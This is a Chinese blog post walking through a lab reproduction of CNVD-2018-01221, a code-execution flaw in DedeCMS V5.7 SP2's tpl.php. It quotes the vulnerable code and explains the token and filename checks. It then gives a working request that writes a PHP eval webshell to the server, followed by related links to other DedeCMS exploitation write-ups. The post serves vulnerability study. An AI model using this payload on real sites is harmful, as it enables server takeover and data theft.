dedeCMS后台代码执行漏洞-CNVD-2018-01221

最新推荐文章于 2025-03-20 19:15:04 发布
最新推荐文章于 2025-03-20 19:15:04 发布
阅读量2k 收藏
点赞数 1
分类专栏: 漏洞复现 渗透测试 文章标签: 漏洞复现 dedeCMS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41954384/article/details/93057317
版权

复现的第一个漏洞,CNVD-2018-01221,虽然有些鸡肋(要拿到管理员权限),但还是从中学到了很多

DeDeCMS简介

织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DeDeCMS V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。以下是漏洞详情
在这里插入图片描述

环境搭建

DeDeCMS官网:http://www.dedecms.com
网站源代码版本:DeDeCMS V5.7 SP2(UTF-8)
网站源码下载:http://www.dedecms.com/products/dedecms/downloads/
下载好后放到本地WWW目录下,然后开启PHPstudy,在浏览器访问
在这里插入图片描述
点击我已阅读并继续。然后是环境检测,保存默认即可
在这里插入图片描述
接下来是参数配置,需要设置的只有数据库密码,把自己的密码填上去就行了
在这里插入图片描述
然后就把环境搭好了,是不是很简单!
在这里插入图片描述

漏洞复现

由于此漏洞属于后台漏洞,所以我们要先登陆到后台,默认账号和密码都是admin。DeDeCMS默认后台路径是/uploads/dede,正常情况下,一个网站的后台路径肯定会被管理员更改,现在我们只做测试用,所以直接登陆。
在这里插入图片描述
根据已经公开的漏洞详情,我们知道tpl.php里面有代码执行漏洞,下面我们来找到tpl.php中存在漏洞的地方,这里就考验到代码审计能力了

/*---------------------------
function savetagfile() { }
保存标签碎片修改
--------------------------*/
else if($action=='savetagfile')
{
    csrf_check();
    if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))
    {
        ShowMsg('文件名不合法,不允许进行操作!', '-1');
        exit();
    }
    require_once(DEDEINC.'/oxwindow.class.php');
    $tagname = preg_replace("#\.lib\.php$#i", "", $filename);
    $content = stripslashes($content);
    $truefile = DEDEINC.'/taglib/'.$filename;
    $fp = fopen($truefile, 'w');
    fwrite($fp, $content);
    fclose($fp);

代码分析

(1)此处定义了一个savetagfile的函数,首先做一个判断,参数“action”是否等于savetagfile,如果等于,就进行下一步
(2)csrf_chack(),这里有一个csrf检验的函数,我们需要加上token来绕过,token是登陆的令牌,当我们向服务器发送登录请求时,在客户端会生成一个用于验证的令牌。
(3)正则表达式匹配,详情参见https://www.runoob.com/regexp/regexp-rule.html*
[a-z0-9_-]{1,}的意思是,匹配所有包含一个以上的字母数字下划线和横杠,后面的\.意思是匹配小数点
所以最终那个判断条件的意思是如果参数filename不符合上述的匹配条件,那么就不允许修改操作的进行
(4)preg_replace的意思是执行一个正则表达式的搜索和替换,我们可以通过例子来分析一下,发现得到的$tagname的值为moonsec
(5)stripslashes()的作用是引用用一个引用字符串,此处没有多大的作用
(6)最后是把$content里的内容写入到相对用的路径里,问题就出在了这里,这一部分代码除了对写入的文件名字做了简单的过滤,除了有一个csrf防护之外,其他并没有什么安全措施,导致我们可以任意写入代码,如果我们直接写入一句话木马,那么就可以直接连上去拿webshell了

在这里插入图片描述
分析完之后就可以进行实际操作了,先理一下思路,我们根据上面的代码知道要上传的参数有:action,token,filename,content.现在只剩下获取token了,要怎么才能获取到token呢?我们再去tpl.php里看一下,发现action的参数有很多,比如del,upoladok,edit,upload等等,但只有传入upload的时候页面才会回显正常,而其他的都会显示token异常,所以只能通过action=upload来获取token,查看页面源代码
在这里插入图片描述
所以构造payload如下
域名+/tpl.php?action=savetagfile&token=&filename=abc.lib.php&content=<?php @eval($_POST['xxx'])?>
发现成功写入
在这里插入图片描述
并且在相应的目录下也找到了abc.lib.php,接下来的菜刀连接就不用再多说了吧!(手动滑稽)

总结

漏洞复现的目的是让自己明白哪些地方容易有漏洞,应该怎么处理发现的漏洞,通过反复的练习才会有长足的进步。

DedeCMS 未授权远程命令执行漏洞分析
Keepb1ue的博客
04-12 1421
DedeCMS是国内专业的PHP网站内容管理系统-织梦内容管理系统,采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY自己的网站提供了强有力的支持。高效率标签缓存机制:允许对同类的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 3117
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
Dedecms代码执行(cnvd-2018-01221)
m0_65150886的博客
02-02 395
织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统。Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。2.访问http://ip:port/dede/login.php,进入后台登录页面。1.访问http://ip:port,出现如下页面,开始实验。5.蚁剑连接,getshell。1.禁止此处写入文件。4.访问上传文件路径。
(常见cms漏洞DeDecms
最新发布
l2772513700的博客
03-20 354
DedeCMS是织梦团队开发PHP网站管理系统,它以简单、易用、高效为特色,组建出各种各样各具特色的网站,如地方门户、行业门户、政府及企事业站点等。把源码文件放到根目录下,访问网站/Dede/uploads/dede进行登录。
DedeCMS V5.7 SP2 后台代码执行漏洞-CNVD-2018-01221
WFC1006848997的博客
02-06 1383
织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DeDeCMS V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。 首先我们先去官网下载DedeCMS V5.7 SP2 下载网址:http://www.dedecms.com/products/dedecms/downloads/ 源代码版本:DeDeCMS V5....
DedeCMS V5.7 SP2存在代码执行漏洞分析(CNVD-2018-01221
wednesday的博客
07-15 656
该问题是一个由任意文件上传带来的代码执行漏洞,由于本身要求上传php结尾文件,再加上未对上传文件内容进行检查,所以导致了该漏洞漏洞产生在/dede/tpl.php,由此可见要利用该漏洞你得登录进后台。问题产生在代码251行开始。代码详解如下图 漏洞复现: 前提是你得通过其他方法进入到dede的后台,比如弱口令啥的。 然后由上述图片中csrf_check()函数会校验token,所以我们得先获取到token。 要怎么才能获取到token呢?我们再去tpl.php里看一下,发现ac
dedeCMS后台上传getshell漏洞CNVD-2018-01221复现
weixin_44897902的博客
10-27 1794
漏洞名: CNVD-2018-01221 影响: Dedecms v5.7 sp2 危害: 任意代码执行,getshell; 准备工作: win7虚拟机+Dedecms v5.7 sp2+phpstudy 首先安装Dedecms v5.7 sp2: http://www.dedecms.com 下载安装之后直接访问localhost/Dedecms v5.7 sp2/uploads 会自动跳到...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6019
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
攻防演练比赛中攻击队常用的测试方法列举
maoguan121的博客
09-29 1392
在实战过程中,蓝队专家根据实战攻防演练的任务特点逐渐总结 出一套成熟的做法:外网纵向突破重点寻找薄弱点,围绕薄弱点,利 用各种攻击手段实现突破;内网横向拓展以突破点为支点,利用各种 攻击手段在内网以点带面实现横向拓展,遍地开花。实战攻防演练 中,各种攻击手段的运用往往不是孤立的,而是相互交叉配合的,某 一渗透拓展步骤很难只通过一种手段实现,通常需要同时运用两种或 两种以上的手段才能成功。
2021Web安全面试题大全(附答案详解)看完稳了
m0_59991869的博客
10-13 1万+
人人都有一个进大厂的梦想,而进大厂的门槛也可想而知,所以这里整理了一份安全大厂的面试大全,看完文章如果对你有帮助的话希望能够点赞+收藏+关注!感谢! 本篇文章对于学习Web安全的朋友来说应该是目前最全面的面试题合集了,后续也会陆续更新其他大厂的面试题目和知识点。另外我还整理了许多关于Web安全的学习资料+工具包等等,需要的点击Web安全学习 一、渗透测试面试题,包含大量渗透技巧 1.拿到一个待检测的站,你觉得应该先做什么? a、信息收集 1、获取域名的whois信息,获取注册者邮箱姓名电话等,丢
dedeCMS V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221)
W小哥
03-03 2561
一、漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统。Dedecms V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。 二、利用条件 该漏洞利用需要登录后台,并且后台的账户权限是管理员权限。 三、漏洞环境搭建 1、官方下载DeDeCMS V5.7 SP2(UTF-8),下载地址: http://www.d...
[漏洞复现]dedeCMS V5.7 SP2后台代码执行(CNVD-2018-01221)
Vicl1fe的博客
02-19 765
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/yuzly/p/11326571.html 源码网址: http://www.dedecms.com/products/dedecms/downloads/ 漏洞概述 需要以管理员权限登录后台。在tpl.php中savefile行为没有进行严格的过滤 ...
结尾%3c php,DedeCMS V5.7 SP2 后台代码执行漏洞-CNVD-2018-01221
weixin_36078354的博客
03-24 223
织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DeDeCMS V5.7 SP2版本中的tpl.php中存在代码执行漏洞,可以通过该漏洞在增加新标签中上传木马,获取webshell。首先我们先去官网下载DedeCMS V5.7 SP2下载网址:http://www.dedecms.com/products/dedecms/downloads/源代码版本:DeDeCMS V5.7 S...
php利用phar进行ssrf,DedeCMS 后台存在SSRF漏洞
weixin_30650955的博客
03-11 189
dedecms后台存在ucenter功能,可以直接修改ucenter的配置,使网站的mysql连接。指向我们预先构造的rogue mysql server https://github.com/Gifts/Rogue-MySql-Server.git设置之后我们就可以通过修改恶意服务端的设置来读取任意文件。 假如读取的文件路径是以phar协议开头的,那么读取的文件内容就会被反序列化。 根据ded...
白盒审计DeDeCMS拿到CNVD证书
Ambition_sec的博客
08-01 789
这段时间进行代码审计出了一个漏洞,也就是DeDeCMS的文件写入漏洞,是可以直接拿到网站的webshell权限的,因为现在新的版本已经发布出来了,这个漏洞也被CNVD收录所以现在写一篇篇文章,说下当时的一个审计流程。
DEDECMS 爆严重安全漏洞 免账号密码直接进入后台
热门推荐
IT技术宅-北方的刀郎
03-21 1万+
DEDECMS 爆严重安全漏洞 免账号密码直接进入后台来源:互联网 作者:佚名 时间:08-20 23:46:44 【大 中 小】众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?
DEDECMS爆严重安全漏洞免账号密码直接进入后台
收集盒 Book box
08-13 1237
众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。” 入侵步骤如下:http://www.xx.com/织梦网站后台/login.php
DedeCMS V5.7存在任意文件删除漏洞
2301_80127209的博客
12-22 451
本文由掌控安全学院 - nocircle 投稿。
漏洞学习——SSRF】人人网几处站点存在SSRF漏洞
Fly_鹏程万里
02-22 989
漏洞学习 使用ssrf可进行内网渗透,利用跳转可进行其他协议探测是一个不错的姿势 http://war.gamebbs.renren.com/forum.php?mod=ajax&amp;action=downremoteimg&amp;message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog...
Fastjson反序列化远程代码执行漏洞CNVD-2020-30827)漏洞复现
12-28
### 复现 FastJSON 反序列化远程代码执行漏洞 CNVD-2020-30827 #### 准备工作 为了复现漏洞,需准备以下条件: - 使用受影响版本的 FastJSON 库(<= 1.2.64),因为这些版本存在反序列化过程中处理 `@type` 字段的安全缺陷[^1]。 - 构建一个能够接收 JSON 输入的应用程序接口。 #### 漏洞原理说明 FastJSON 在解析含有 `@type` 的 JSON 数据时会尝试实例化对应的 Java 类对象。如果应用程序允许不受信任的数据源提供此类输入,则可能触发任意代码执行。特别是当开启 autotype 功能后,风险显著增加,攻击者可以通过精心构造的 payload 实现 RCE (Remote Code Execution)。 #### 利用过程描述 构建恶意负载的关键在于找到合适的 gadget chain 来达成最终的目标——执行任意命令。对于 CNVD-2020-30827 特定情况而言,通常涉及利用某些标准库中的类作为起点,比如 JdkSerializeRMI 或其他能间接导致 shell 命令被执行的方法路径。 具体来说,可以创建如下结构的 JSON 负载用于测试目的(请注意这仅限于合法授权下的安全研究环境内操作): ```json { "@type": "java.net.InetAddress", "val": "localhost" } ``` 上述例子展示了最基础形式之一;实际攻击场景下可能会更加复杂,并且依赖具体的业务逻辑以及可用 gadgets 组合而成更强大的链路来完成整个攻击面覆盖。 #### 安全建议 鉴于该类型的漏洞可能导致严重的安全隐患,在生产环境中应严格限制对外部可控数据使用 FastJSON 进行反序列化操作,并及时升级至官方发布的最新稳定版以获得必要的修复补丁和支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值